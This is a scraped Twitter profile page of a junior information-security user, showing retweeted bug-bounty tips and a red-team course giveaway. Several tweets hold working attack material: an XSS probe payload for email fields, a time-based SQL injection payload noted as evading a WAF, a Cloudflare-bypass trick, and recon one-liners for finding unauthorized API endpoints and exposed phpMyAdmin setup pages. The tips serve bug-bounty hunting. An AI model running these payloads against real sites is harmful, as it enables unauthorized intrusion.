foulany (@tenzensow) 's Twitter Profile

I am a junior Information Security 🇲🇷

ID: 1128358256542474241

14-05-2019 17:55:47

2,2K Tweet

149 Followers

1,1K Following

Abdulrahman Makki | عبدالرحمن مكي (@amakki1337)

#bugbountytips

Sometimes when you visit a website using Burp Suite, Cloudflare stops you, but when you disable the proxy it works. Here is how to bypass it using Burp Suite ✍️

Enable match and replace with the following:
pastebin.com/raw/HRZzeZLJ

#Cloudflare #BugBounty

Paul Seekamp (@nullenc0de)

I just found an unbelievable number of unauthorized API endpoints using this 1 liner. katana -u $url -hl -nos -jc -silent -aff -kf all,robotstxt,sitemapxml -c 150 -fs fqdn |subjs | python3 /opt/JSA/jsa.py |goverview probe -N -c 500 |sort -u -t';' -k2,14 |cut -d ';' -f1

Bipin Jitiya (@win3zz)

Tools that make my #InfoSec life easy🕵️‍♂️

AFL, Burp Suite, checkov, dirsearch, Frida, httpx, IDA, jadx-gui, John The Ripper, Linux utilities (Netcat/nc, curl, gdb, sed, man, BusyBox, nohup, etc), Metasploit, mimikatz, MobSF, Nessus, ngrok, Nmap, SQLmap, WireShark, Ysoserial

Know more tools? Reply👇

🇷🇴 cristi (@cristivlad25)

7. Read the entire writeup below. #pentesting #infosec #appsec #cybersecurity #ethicalhacking #bugbounty #hacking cristivlad.medium.com/exfiltrating-a…

Deepak bug_vs_me (@bug_vs_me)

Whenever you see any email input field! 70% of bug hunters don't try XSS there as compared to the name field. Always try this in the email input field! "<img/src/onerror=alert(0)"Josh Holly.com This doesn't work every time, but give it a try; found 2 XSS today using this! #bugbountytips

Firas 🐘 (@retkoussa)

Are you tired of the tedious process of installing your bug bounty tools every time you start fresh? 🔍 With reFresh, you can automate the installation of top tools from industry legends like TomNomNom, ProjectDiscovery, Luke Stephens (hakluke), and / XNL -н4cĸ3r (and @xnl-h4ck3r in the new Sky) 💻 github.com/retkoussa/reFr…

Nikhil (@ox4d5a)

GIVEAWAY of my new course "Windows Services for Red Teamers" to 5 people who liked and retweeted this tweet.
Winners will be picked on Wednesday.

redteamsorcery.teachable.com/p/windows-serv…

#infosec #Malware #redteam #windows

N$ (@nav1n0x)

Final payload: ``0'XOR(if(now()=sysdate(),sleep(4*4),0))XOR'Z.php``. Worth noting: I still couldn't find out if there is a real SQL injection or not; both Ghauri and SQLMap fail to detect any possible injections. The Lord WAF is too strong there...

Godfather Orwa 🇯🇴 (@godfatherorwa)

#bugbountytip #bugbountytips 

I found a phpmyadmin template on nuclei
phpmyadmin-setup.yaml

next step: edit that template for
/admin/

template endpoint was [/pma/setup/index.php]
I found 2 on [/admin/pma/setup/index.php]

happy hunting ♥
#BugBounty

Paul Seekamp (@nullenc0de)

Trouble figuring out which ASN belongs to a company? This should help ensure you found the correct one.👇 echo tesla .com |subfinder |dnsx -silent -resp-only |sort -u |asnmap -json -silent | jq -r '. | select(.as_name | test("(?i)tesla[a-z]{0,10}$")) | .as_range[]' |sort -u